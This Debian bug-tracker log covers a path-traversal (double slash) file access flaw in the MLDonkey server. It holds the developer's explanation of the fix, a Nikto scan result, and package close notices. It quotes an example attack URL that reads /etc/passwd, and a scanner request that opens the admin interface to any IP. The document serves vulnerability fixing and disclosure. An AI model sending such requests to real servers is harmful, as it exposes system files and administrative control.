Bug#516829; Package mldonkey-server. (Tue, 10 Mar 2009 21:36:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Spiral Voice <spiralvoice@web.de>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Tue, 10 Mar 2009 21:36:06 GMT) Full text and rfc822 format available.

Message #24 received at 516829@bugs.debian.org (full text, mbox):

From: Spiral Voice <spiralvoice@web.de>
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Tue, 10 Mar 2009 22:34:23 +0100
Hi,

here is a copy of an email I wrote today:

Mehdi Dogguy schrieb:
> > Hello,
> > 
> > I'm trying to understand why the submitted patch is enough to fix the
> > issue. More particularly, how /../ are removed from the url?
> > 
> > Cheers,
> > 

Hi,

the fix for MLDonkey consists of two parts, first this patch which
removes leading slashes from the path/filename-part of an URL:

http://cvs.savannah.gnu.org/viewvc/mldonkey/src/utils/lib/url.ml?root=mldonkey&r1=1.9&r2=1.10

This fixes http://mldonkey:4080//etc/passwd style attacks.

This was not enough however to fix the problem so I added this patch:

http://cvs.savannah.gnu.org/viewvc/mldonkey/src/daemon/driver/driverControlers.ml?root=mldonkey&r1=1.113&r2=1.114

The old code worked like this:

If the file requested is not an MLDonkey command or an otherwise
internally defined file this code was called:

| s ->  http_send_bin r buf (String.lowercase s)

The function http_send_bin was extended in MLDonkey 2.8.4 to
check the internal commonPictures database which contains country
flags, if a file was not found there, File.to_string was called which
reads files from the local filesystem -> bad idea.

So, the problem was created when country flags were added to
MLDonkey.

I changed the code shown above to 

| s -> http_send_bin_pictures r buf (String.lowercase s)

http_send_bin_pictures is basically the same function as
http_send_bin, but it only checks the commonPictures database
and does not read any files from the local disc - > problem solved.

Cheers, spiralvoice

______________________________________________________________________________
Nur bis 16.03.! DSL-Komplettanschluss inkl. WLAN-Modem für nur 17,95 EURO/mtl.
 + 1 Monat gratis!* http://dsl.web.de/?ac=OM.AD.AD008K15039B7069a





Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Tue, 10 Mar 2009 21:42:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Spiral Voice <spiralvoice@web.de>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Tue, 10 Mar 2009 21:42:06 GMT) Full text and rfc822 format available.

Message #29 received at 516829@bugs.debian.org (full text, mbox):

From: Spiral Voice <spiralvoice@web.de>
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Tue, 10 Mar 2009 22:37:20 +0100
Hi,

this scan was done against MLDonkey 3.0.0:

---------------------------------------------------------------------------
- Nikto 2.02/2.03     -     cirt.net
+ Target IP:       192.168.1.8
+ Target Hostname: router
+ Target Port:     4080
+ Start Time:      2009-03-11 22:33:08
---------------------------------------------------------------------------
+ Server: No banner retrieved
- Successfully authenticated to realm "MLdonkey".
+ OSVDB-3126: GET /submit?setoption=q&option=allowed_ips&value=255.255.255.255 : MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ 2967 items checked: 1 item(s) reported on remote host
+ End Time:        2009-03-11 22:35:23 (135 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The message about allowed_ips can be ignored, default is 127.0.0.1.

Cheers, spiralvoice

____________________________________________________________________
Psssst! Schon vom neuen WEB.DE MultiMessenger gehört? 
Der kann`s mit allen: http://www.produkte.web.de/messenger/?did=3123





Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Mon, 16 Mar 2009 13:21:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Mon, 16 Mar 2009 13:21:04 GMT) Full text and rfc822 format available.

Message #34 received at 516829@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Mon, 16 Mar 2009 14:18:42 +0100
[Message part 1 (text/plain, inline)]
Hi,
this bug was marked as pending on February 24th. What is 
missing for the upload? Do you need an NMU?

Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Message part 2 (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Mon, 16 Mar 2009 13:45:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Mon, 16 Mar 2009 13:45:03 GMT) Full text and rfc822 format available.

Message #39 received at 516829@bugs.debian.org (full text, mbox):

From: Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>
To: Nico Golde <nion@debian.org>, 516829@bugs.debian.org
Subject: Re: Bug#516829: Http double slash request arbitrary file access vulnerability
Date: Mon, 16 Mar 2009 14:42:20 +0100

Nico Golde wrote:
> Hi,
> this bug was marked as pending on February 24th. What is 
> missing for the upload? Do you need an NMU?
> 

We were fixing other bugs. It will uploaded ASAP (tonight...).

Cheers,

-- 
Mehdi Dogguy مهدي الدقي
http://www.pps.jussieu.fr/~dogguy
Tel.: (+33).1.44.27.28.38




Reply sent to Samuel Mimram <smimram@debian.org>:
You have taken responsibility. (Mon, 16 Mar 2009 19:39:21 GMT) Full text and rfc822 format available.

Notification sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Bug acknowledged by developer. (Mon, 16 Mar 2009 19:39:21 GMT) Full text and rfc822 format available.

Message #44 received at 516829-close@bugs.debian.org (full text, mbox):

From: Samuel Mimram <smimram@debian.org>
To: 516829-close@bugs.debian.org
Subject: Bug#516829: fixed in mldonkey 3.0.0-1
Date: Mon, 16 Mar 2009 19:32:31 +0000
Source: mldonkey
Source-Version: 3.0.0-1

We believe that the bug you reported is fixed in the latest version of
mldonkey, which is due to be installed in the Debian FTP archive:

mldonkey-gui_3.0.0-1_i386.deb
  to pool/main/m/mldonkey/mldonkey-gui_3.0.0-1_i386.deb
mldonkey-server_3.0.0-1_i386.deb
  to pool/main/m/mldonkey/mldonkey-server_3.0.0-1_i386.deb
mldonkey_3.0.0-1.diff.gz
  to pool/main/m/mldonkey/mldonkey_3.0.0-1.diff.gz
mldonkey_3.0.0-1.dsc
  to pool/main/m/mldonkey/mldonkey_3.0.0-1.dsc
mldonkey_3.0.0.orig.tar.gz
  to pool/main/m/mldonkey/mldonkey_3.0.0.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 516829@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Samuel Mimram <smimram@debian.org> (supplier of updated mldonkey package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Mon, 16 Mar 2009 20:11:12 +0100
Source: mldonkey
Binary: mldonkey-server mldonkey-gui
Architecture: source i386
Version: 3.0.0-1
Distribution: unstable
Urgency: low
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Changed-By: Samuel Mimram <smimram@debian.org>
Description: 
 mldonkey-gui - Graphical frontend for mldonkey based on GTK+
 mldonkey-server - Door to the 'donkey' network
Closes: 204266 332324 432205 484674 487803 508280 508436 508533 508538 509001 513369 514449 516829 517996
Changes: 
 mldonkey (3.0.0-1) unstable; urgency=low
 .
   [ Sylvain Le Gall ]
   * Remove useless explanation in chroot section of README.Debian.
   * Add debian/gbp.conf to force using pristine-tar
 .
   [ Stephane Glondu ]
   * Switch packaging to git.
 .
   [ Samuel Mimram ]
   * New upstream release, closes: #508280.
   * Fixes alignement problem on ARM, closes: #487803.
   * Remove useless line in init script, closes: #509001.
   * Better handling of errors in init script, closes: #508538.
   * Pass --debconf-ok option to ucf, closes: #514449.
   * Mention default telnet port in README.Debian, closes: #508436.
   * Updated vietnamese debconf translation, closes: #513369.
   * Update standards version to 3.8.1.
   * Don't uselessly build-depend on dpkg-dev.
   * Version reference to GPL in copyright.
 .
   [ Mehdi Dogguy ]
   * New upstream release, closes: #516829.
   * Bump standards version to 3.8.0, no changes needed.
   * Fix Lintian warning concerning debian/mldonkey-server.postinst: not
     specify full path of used commands.
   * Add ${misc:Depends} as a dependency for mldonkey-gui.
   * Add myself to uploaders.
   * Add DMUA flag (with Sam's blessing)
   * Add Homepage field
   * Use ocamlbuild to build utils
   * Add msse2 flag for i386 architecture
   * Simplify debian/rules
   * Create a manpage for mldonkey (link to mlnet's manpage for the moment)
   * Drop chrooted-mlnet support and do not suggest makejail anymore,
     closes: #204266.
   * Update/install NEWS.Debian and mention (again) removal of mldonkey_server
     (already mentioned in this changelog, entries 2.8.1-3, 2.8.3-2 and
     2.8.5-2), closes: #517996.
   * Add missing build-dependency libbz2-dev to enable Directconnect protocol.
   * Move mldonkey_{files,options,command,submit} to /usr/lib/mldonkey.
     Closes: #484674
   * Move the daemon's log in /var/log/mldonkey, closes: #508533.
   * Add debian/xml-man/generate-man to automatically generate manpages from
     help output, closes: #432205.
   * Remove some debconf questions, closes: #332324.
Checksums-Sha1: 
 39ae847009c836a1fd78c9b041a465f2b6019836 1613 mldonkey_3.0.0-1.dsc
 3a3309ae7cc0f5844016ac03451e72a99458a662 3350386 mldonkey_3.0.0.orig.tar.gz
 9f342b7f376f536b65ec3530c0e16f96c711bb88 128406 mldonkey_3.0.0-1.diff.gz
 ea61149b26a243d159da49656190995160ddb882 2583810 mldonkey-server_3.0.0-1_i386.deb
 ef55372b141d23d303850af39245bc842480ffc1 3729030 mldonkey-gui_3.0.0-1_i386.deb
Checksums-Sha256: 
 b763c06b814072270c72ab12d0dd3099d135f23f52a12192091ddf4279c45eee 1613 mldonkey_3.0.0-1.dsc
 a6bfc60922e4b6b0aea030a258833a95d74bb2111afdaa5a055ca2de2607708f 3350386 mldonkey_3.0.0.orig.tar.gz
 68eac7fc60014224a10baf9b901b02d3733e583618bc61c6527b9a3bf2c2e344 128406 mldonkey_3.0.0-1.diff.gz
 428a0476a2c335b4fbbb8fbe4ef5d61f1c95b00fe9f88048ad315fcf71afb36e 2583810 mldonkey-server_3.0.0-1_i386.deb
 35bcbbd091d81749232edda37f7458991f43a3ed4197f98afe99c07e523190e4 3729030 mldonkey-gui_3.0.0-1_i386.deb
Files: 
 6e2b1d296472599769729d695f77397d 1613 net optional mldonkey_3.0.0-1.dsc
 7d3341c4fdb7a18ada73c3dfe3649c9e 3350386 net optional mldonkey_3.0.0.orig.tar.gz
 b91f4fc652b043506bf6f68f9f524177 128406 net optional mldonkey_3.0.0-1.diff.gz
 892587648dc780c90da1bb9f6af26fa9 2583810 net optional mldonkey-server_3.0.0-1_i386.deb
 82409c4885096f33e33bf3185400df4e 3729030 net optional mldonkey-gui_3.0.0-1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm+pgMACgkQIae1O4AJae+JDgCeNMEkycAIQi5363tArmmBU9Fn
ho8An0F6mVISWL7OjGal5hhzrF3UrZzl
=cstL
-----END PGP SIGNATURE-----





Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. (Wed, 25 Mar 2009 14:12:04 GMT) Full text and rfc822 format available.

Notification sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Bug acknowledged by developer. (Wed, 25 Mar 2009 14:12:04 GMT) Full text and rfc822 format available.

Message #49 received at 516829-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 516829-close@bugs.debian.org
Subject: Bug#516829: fixed in mldonkey 2.9.5-2+lenny1
Date: Wed, 25 Mar 2009 13:53:37 +0000
Source: mldonkey
Source-Version: 2.9.5-2+lenny1

We believe that the bug you reported is fixed in the latest version of
mldonkey, which is due to be installed in the Debian FTP archive:

mldonkey-gui_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-gui_2.9.5-2+lenny1_amd64.deb
mldonkey-server_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-server_2.9.5-2+lenny1_amd64.deb
mldonkey_2.9.5-2+lenny1.diff.gz
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.diff.gz
mldonkey_2.9.5-2+lenny1.dsc
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 516829@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated mldonkey package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 12 Mar 2009 21:26:26 +0100
Source: mldonkey
Binary: mldonkey-server mldonkey-gui
Architecture: source amd64
Version: 2.9.5-2+lenny1
Distribution: stable-security
Urgency: high
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 mldonkey-gui - Graphical frontend for mldonkey based on GTK+
 mldonkey-server - Door to the 'donkey' network
Closes: 516829
Changes: 
 mldonkey (2.9.5-2+lenny1) stable-security; urgency=high
 .
   * Non-maintainer upload by the security team
   * Add url.dpatch: Fix double slash vulnerability, closes: #516829.
Checksums-Sha1: 
 36c66cbf92f04012637090bb9a2b63bf12656cba 1894 mldonkey_2.9.5-2+lenny1.dsc
 df1edd0eb5965ba49836f097be53454a5193b3a7 3346730 mldonkey_2.9.5.orig.tar.gz
 e7866b498fa2fbc8d6bb6209cd488eda4c9aaff1 141220 mldonkey_2.9.5-2+lenny1.diff.gz
 15c618f3c1efc9bade920c207e1f6da20ecc0bc8 2693524 mldonkey-server_2.9.5-2+lenny1_amd64.deb
 f690fb20dd8d34149805ca4a9c9bd40bccb36ecd 3945406 mldonkey-gui_2.9.5-2+lenny1_amd64.deb
Checksums-Sha256: 
 e35bc7d10b6efe4742b64d70e6eff95bdec52ec5f3dab8407da6c67ae4e9d5d3 1894 mldonkey_2.9.5-2+lenny1.dsc
 f091d2f40e800ecf32651aed984d8fabf9b550ae0e5dc451e66743426bdf8aff 3346730 mldonkey_2.9.5.orig.tar.gz
 aa77f5843bc70ab34dfc3a1425f069d14809f441465b43bce9db50b77b82c586 141220 mldonkey_2.9.5-2+lenny1.diff.gz
 f69f454e45318cb4037fdad953c92007ddcb3e94ecda4464bf1d52a98e1b659a 2693524 mldonkey-server_2.9.5-2+lenny1_amd64.deb
 81ca175b3adaca97c1a778796d241846dc8e7ad269508c6b663e34d467872180 3945406 mldonkey-gui_2.9.5-2+lenny1_amd64.deb
Files: 
 80d8a01209691f1ab695073a77bf671a 1894 net optional mldonkey_2.9.5-2+lenny1.dsc
 280207370693e16ae51d4a3b28d6424e 3346730 net optional mldonkey_2.9.5.orig.tar.gz
 515bfab6892fc58b4a46fc0b26a1fd72 141220 net optional mldonkey_2.9.5-2+lenny1.diff.gz
 eee55c6718a61403aedfeb2ff4fdc285 2693524 net optional mldonkey-server_2.9.5-2+lenny1_amd64.deb
 ed6496fb59f045cf00191d627ebe35fd 3945406 net optional mldonkey-gui_2.9.5-2+lenny1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJuXGGAAoJEL97/wQC1SS+U1sH/3MuE8l5TCIesKaa5PJaqsX1
QC32oHo7CAeNDXoyopTQpLp1LhhMY5qLK4EexzE2pa8bo01EL6un9p+6jCuTU+p8
eBX6SOmxFIRdn1ET0SeKCglaBgoloC28GgJ+cRbsQMniBUiLOG1M3P+J08Tf+Etn
ijo4+pXuLfz+BfF3Z1IRqOvRXA2zz9UMQcffyyxbcNDHkkLo4KuwSEUGj28Mi23o
S0VI0gq3Xv+QPKeaZ3sjV2pHrS44TCrzRaAFCIGK218X3bsiQu/QBPTIrNG0xc9l
ftXouATwUWz25LBAWhiDLxg1qdjjcsCidGRZZbj+8Yr82Uixp/1sQg3qpQXqy00=
=f/+U
-----END PGP SIGNATURE-----





Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. (Sat, 11 Apr 2009 17:39:13 GMT) Full text and rfc822 format available.

Notification sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Bug acknowledged by developer. (Sat, 11 Apr 2009 17:39:13 GMT) Full text and rfc822 format available.

Message #54 received at 516829-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 516829-close@bugs.debian.org
Subject: Bug#516829: fixed in mldonkey 2.9.5-2+lenny1
Date: Sat, 11 Apr 2009 16:47:31 +0000
Source: mldonkey
Source-Version: 2.9.5-2+lenny1

We believe that the bug you reported is fixed in the latest version of
mldonkey, which is due to be installed in the Debian FTP archive:

mldonkey-gui_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-gui_2.9.5-2+lenny1_amd64.deb
mldonkey-server_2.9.5-2+lenny1_amd64.deb
  to pool/main/m/mldonkey/mldonkey-server_2.9.5-2+lenny1_amd64.deb
mldonkey_2.9.5-2+lenny1.diff.gz
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.diff.gz
mldonkey_2.9.5-2+lenny1.dsc
  to pool/main/m/mldonkey/mldonkey_2.9.5-2+lenny1.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 516829@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated mldonkey package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 12 Mar 2009 21:26:26 +0100
Source: mldonkey
Binary: mldonkey-server mldonkey-gui
Architecture: source amd64
Version: 2.9.5-2+lenny1
Distribution: stable-security
Urgency: high
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 mldonkey-gui - Graphical frontend for mldonkey based on GTK+
 mldonkey-server - Door to the 'donkey' network
Closes: 516829
Changes: 
 mldonkey (2.9.5-2+lenny1) stable-security; urgency=high
 .
   * Non-maintainer upload by the security team
   * Add url.dpatch: Fix double slash vulnerability, closes: #516829.
Checksums-Sha1: 
 36c66cbf92f04012637090bb9a2b63bf12656cba 1894 mldonkey_2.9.5-2+lenny1.dsc
 df1edd0eb5965ba49836f097be53454a5193b3a7 3346730 mldonkey_2.9.5.orig.tar.gz
 e7866b498fa2fbc8d6bb6209cd488eda4c9aaff1 141220 mldonkey_2.9.5-2+lenny1.diff.gz
 15c618f3c1efc9bade920c207e1f6da20ecc0bc8 2693524 mldonkey-server_2.9.5-2+lenny1_amd64.deb
 f690fb20dd8d34149805ca4a9c9bd40bccb36ecd 3945406 mldonkey-gui_2.9.5-2+lenny1_amd64.deb
Checksums-Sha256: 
 e35bc7d10b6efe4742b64d70e6eff95bdec52ec5f3dab8407da6c67ae4e9d5d3 1894 mldonkey_2.9.5-2+lenny1.dsc
 f091d2f40e800ecf32651aed984d8fabf9b550ae0e5dc451e66743426bdf8aff 3346730 mldonkey_2.9.5.orig.tar.gz
 aa77f5843bc70ab34dfc3a1425f069d14809f441465b43bce9db50b77b82c586 141220 mldonkey_2.9.5-2+lenny1.diff.gz
 f69f454e45318cb4037fdad953c92007ddcb3e94ecda4464bf1d52a98e1b659a 2693524 mldonkey-server_2.9.5-2+lenny1_amd64.deb
 81ca175b3adaca97c1a778796d241846dc8e7ad269508c6b663e34d467872180 3945406 mldonkey-gui_2.9.5-2+lenny1_amd64.deb
Files: 
 80d8a01209691f1ab695073a77bf671a 1894 net optional mldonkey_2.9.5-2+lenny1.dsc
 280207370693e16ae51d4a3b28d6424e 3346730 net optional mldonkey_2.9.5.orig.tar.gz
 515bfab6892fc58b4a46fc0b26a1fd72 141220 net optional mldonkey_2.9.5-2+lenny1.diff.gz
 eee55c6718a61403aedfeb2ff4fdc285 2693524 net optional mldonkey-server_2.9.5-2+lenny1_amd64.deb
 ed6496fb59f045cf00191d627ebe35fd 3945406 net optional mldonkey-gui_2.9.5-2+lenny1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJuXGGAAoJEL97/wQC1SS+U1sH/3MuE8l5TCIesKaa5PJaqsX1
QC32oHo7CAeNDXoyopTQpLp1LhhMY5qLK4EexzE2pa8bo01EL6un9p+6jCuTU+p8
eBX6SOmxFIRdn1ET0SeKCglaBgoloC28GgJ+cRbsQMniBUiLOG1M3P+J08Tf+Etn
ijo4+pXuLfz+BfF3Z1IRqOvRXA2zz9UMQcffyyxbcNDHkkLo4KuwSEUGj28Mi23o
S0VI0gq3Xv+QPKeaZ3sjV2pHrS44TCrzRaAFCIGK218X3bsiQu/QBPTIrNG0xc9l
ftXouATwUWz25LBAWhiDLxg1qdjjcsCidGRZZbj+8Yr82Uixp/1sQg3qpQXqy00=
=f/+U
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 10 May 2009 07:28:19 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 20:06:07 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.